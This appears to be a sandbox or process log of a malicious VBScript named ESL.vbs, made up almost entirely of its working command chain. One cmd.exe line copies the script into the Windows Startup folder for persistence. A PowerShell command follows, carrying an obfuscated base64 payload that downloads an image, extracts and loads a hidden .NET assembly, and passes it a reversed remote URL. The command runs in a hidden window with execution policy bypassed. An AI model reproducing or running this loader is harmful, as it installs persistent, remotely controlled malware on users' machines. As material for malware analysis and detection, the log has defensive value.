ESL.vbs

cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\ESL.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ WLDY.vbs')"

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵VQBy⁂⇵Gw⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵JwBo⁂⇵HQ⁂⇵d⁂⇵Bw⁂⇵HM⁂⇵Og⁂⇵v⁂⇵C8⁂⇵dQBw⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵Z⁂⇵Bl⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBu⁂⇵HM⁂⇵LgBj⁂⇵G8⁂⇵bQ⁂⇵u⁂⇵GI⁂⇵cg⁂⇵v⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBz⁂⇵C8⁂⇵M⁂⇵⁂⇵w⁂⇵DQ⁂⇵Lw⁂⇵1⁂⇵DY⁂⇵Mw⁂⇵v⁂⇵DY⁂⇵Mg⁂⇵x⁂⇵C8⁂⇵bwBy⁂⇵Gk⁂⇵ZwBp⁂⇵G4⁂⇵YQBs⁂⇵C8⁂⇵dQBu⁂⇵Gk⁂⇵dgBl⁂⇵HI⁂⇵cwBv⁂⇵F8⁂⇵dgBi⁂⇵HM⁂⇵LgBq⁂⇵H⁂⇵⁂⇵ZQBn⁂⇵D8⁂⇵MQ⁂⇵2⁂⇵Dk⁂⇵M⁂⇵⁂⇵5⁂⇵DM⁂⇵MQ⁂⇵4⁂⇵DU⁂⇵NQ⁂⇵n⁂⇵Ds⁂⇵J⁂⇵B3⁂⇵GU⁂⇵YgBD⁂⇵Gw⁂⇵aQBl⁂⇵G4⁂⇵d⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵BO⁂⇵GU⁂⇵dw⁂⇵t⁂⇵E8⁂⇵YgBq⁂⇵GU⁂⇵YwB0⁂⇵C⁂⇵⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBO⁂⇵GU⁂⇵d⁂⇵⁂⇵u⁂⇵Fc⁂⇵ZQBi⁂⇵EM⁂⇵b⁂⇵Bp⁂⇵GU⁂⇵bgB0⁂⇵Ds⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵dwBl⁂⇵GI⁂⇵QwBs⁂⇵Gk⁂⇵ZQBu⁂⇵HQ⁂⇵LgBE⁂⇵G8⁂⇵dwBu⁂⇵Gw⁂⇵bwBh⁂⇵GQ⁂⇵R⁂⇵Bh⁂⇵HQ⁂⇵YQ⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FU⁂⇵cgBs⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵Gk⁂⇵bQBh⁂⇵Gc⁂⇵ZQBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBU⁂⇵GU⁂⇵e⁂⇵B0⁂⇵C4⁂⇵RQBu⁂⇵GM⁂⇵bwBk⁂⇵Gk⁂⇵bgBn⁂⇵F0⁂⇵Og⁂⇵6⁂⇵FU⁂⇵V⁂⇵BG⁂⇵Dg⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BT⁂⇵HQ⁂⇵cgBp⁂⇵G4⁂⇵Zw⁂⇵o⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵EI⁂⇵eQB0⁂⇵GU⁂⇵cw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵FM⁂⇵V⁂⇵BB⁂⇵FI⁂⇵V⁂⇵⁂⇵+⁂⇵D4⁂⇵Jw⁂⇵7⁂⇵CQ⁂⇵ZQBu⁂⇵GQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵n⁂⇵Dw⁂⇵P⁂⇵BC⁂⇵EE⁂⇵UwBF⁂⇵DY⁂⇵N⁂⇵Bf⁂⇵EU⁂⇵TgBE⁂⇵D4⁂⇵Pg⁂⇵n⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵CQ⁂⇵aQBt⁂⇵GE⁂⇵ZwBl⁂⇵FQ⁂⇵ZQB4⁂⇵HQ⁂⇵LgBJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵TwBm⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵p⁂⇵Ds⁂⇵J⁂⇵Bl⁂⇵G4⁂⇵Z⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵BP⁂⇵GY⁂⇵K⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵EY⁂⇵b⁂⇵Bh⁂⇵Gc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵cwB0⁂⇵GE⁂⇵cgB0⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwBl⁂⇵C⁂⇵⁂⇵M⁂⇵⁂⇵g⁂⇵C0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵ZwB0⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Ds⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵C⁂⇵⁂⇵Kw⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵RgBs⁂⇵GE⁂⇵Zw⁂⇵u⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ds⁂⇵J⁂⇵Bi⁂⇵GE⁂⇵cwBl⁂⇵DY⁂⇵N⁂⇵BM⁂⇵GU⁂⇵bgBn⁂⇵HQ⁂⇵a⁂⇵⁂⇵g⁂⇵D0⁂⇵I⁂⇵⁂⇵k⁂⇵GU⁂⇵bgBk⁂⇵Ek⁂⇵bgBk⁂⇵GU⁂⇵e⁂⇵⁂⇵g⁂⇵C0⁂⇵I⁂⇵⁂⇵k⁂⇵HM⁂⇵d⁂⇵Bh⁂⇵HI⁂⇵d⁂⇵BJ⁂⇵G4⁂⇵Z⁂⇵Bl⁂⇵Hg⁂⇵Ow⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bp⁂⇵G0⁂⇵YQBn⁂⇵GU⁂⇵V⁂⇵Bl⁂⇵Hg⁂⇵d⁂⇵⁂⇵u⁂⇵FM⁂⇵dQBi⁂⇵HM⁂⇵d⁂⇵By⁂⇵Gk⁂⇵bgBn⁂⇵Cg⁂⇵J⁂⇵Bz⁂⇵HQ⁂⇵YQBy⁂⇵HQ⁂⇵SQBu⁂⇵GQ⁂⇵ZQB4⁂⇵Cw⁂⇵I⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵Ew⁂⇵ZQBu⁂⇵Gc⁂⇵d⁂⇵Bo⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBD⁂⇵G8⁂⇵bgB2⁂⇵GU⁂⇵cgB0⁂⇵F0⁂⇵Og⁂⇵6⁂⇵EY⁂⇵cgBv⁂⇵G0⁂⇵QgBh⁂⇵HM⁂⇵ZQ⁂⇵2⁂⇵DQ⁂⇵UwB0⁂⇵HI⁂⇵aQBu⁂⇵Gc⁂⇵K⁂⇵⁂⇵k⁂⇵GI⁂⇵YQBz⁂⇵GU⁂⇵Ng⁂⇵0⁂⇵EM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵b⁂⇵Bv⁂⇵GE⁂⇵Z⁂⇵Bl⁂⇵GQ⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵C⁂⇵⁂⇵PQ⁂⇵g⁂⇵Fs⁂⇵UwB5⁂⇵HM⁂⇵d⁂⇵Bl⁂⇵G0⁂⇵LgBS⁂⇵GU⁂⇵ZgBs⁂⇵GU⁂⇵YwB0⁂⇵Gk⁂⇵bwBu⁂⇵C4⁂⇵QQBz⁂⇵HM⁂⇵ZQBt⁂⇵GI⁂⇵b⁂⇵B5⁂⇵F0⁂⇵Og⁂⇵6⁂⇵Ew⁂⇵bwBh⁂⇵GQ⁂⇵K⁂⇵⁂⇵k⁂⇵GM⁂⇵bwBt⁂⇵G0⁂⇵YQBu⁂⇵GQ⁂⇵QgB5⁂⇵HQ⁂⇵ZQBz⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵HQ⁂⇵eQBw⁂⇵GU⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵Bs⁂⇵G8⁂⇵YQBk⁂⇵GU⁂⇵Z⁂⇵BB⁂⇵HM⁂⇵cwBl⁂⇵G0⁂⇵YgBs⁂⇵Hk⁂⇵LgBH⁂⇵GU⁂⇵d⁂⇵BU⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵Cg⁂⇵JwBG⁂⇵Gk⁂⇵YgBl⁂⇵HI⁂⇵LgBI⁂⇵G8⁂⇵bQBl⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵bQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵J⁂⇵B0⁂⇵Hk⁂⇵c⁂⇵Bl⁂⇵C4⁂⇵RwBl⁂⇵HQ⁂⇵TQBl⁂⇵HQ⁂⇵a⁂⇵Bv⁂⇵GQ⁂⇵K⁂⇵⁂⇵n⁂⇵FY⁂⇵QQBJ⁂⇵Cc⁂⇵KQ⁂⇵7⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵I⁂⇵⁂⇵9⁂⇵C⁂⇵⁂⇵L⁂⇵⁂⇵o⁂⇵Cc⁂⇵d⁂⇵B4⁂⇵HQ⁂⇵Lg⁂⇵y⁂⇵DM⁂⇵N⁂⇵Bk⁂⇵GU⁂⇵LwBs⁂⇵HQ⁂⇵Lw⁂⇵3⁂⇵DY⁂⇵MQ⁂⇵u⁂⇵DE⁂⇵Ng⁂⇵x⁂⇵C4⁂⇵Ng⁂⇵1⁂⇵DE⁂⇵Lg⁂⇵0⁂⇵Dk⁂⇵Lw⁂⇵v⁂⇵Do⁂⇵c⁂⇵B0⁂⇵HQ⁂⇵a⁂⇵⁂⇵n⁂⇵Ck⁂⇵Ow⁂⇵k⁂⇵G0⁂⇵ZQB0⁂⇵Gg⁂⇵bwBk⁂⇵C4⁂⇵SQBu⁂⇵HY⁂⇵bwBr⁂⇵GU⁂⇵K⁂⇵⁂⇵k⁂⇵G4⁂⇵dQBs⁂⇵Gw⁂⇵L⁂⇵⁂⇵g⁂⇵CQ⁂⇵YQBy⁂⇵Gc⁂⇵dQBt⁂⇵GU⁂⇵bgB0⁂⇵HM⁂⇵KQ⁂⇵=';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂⇵','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD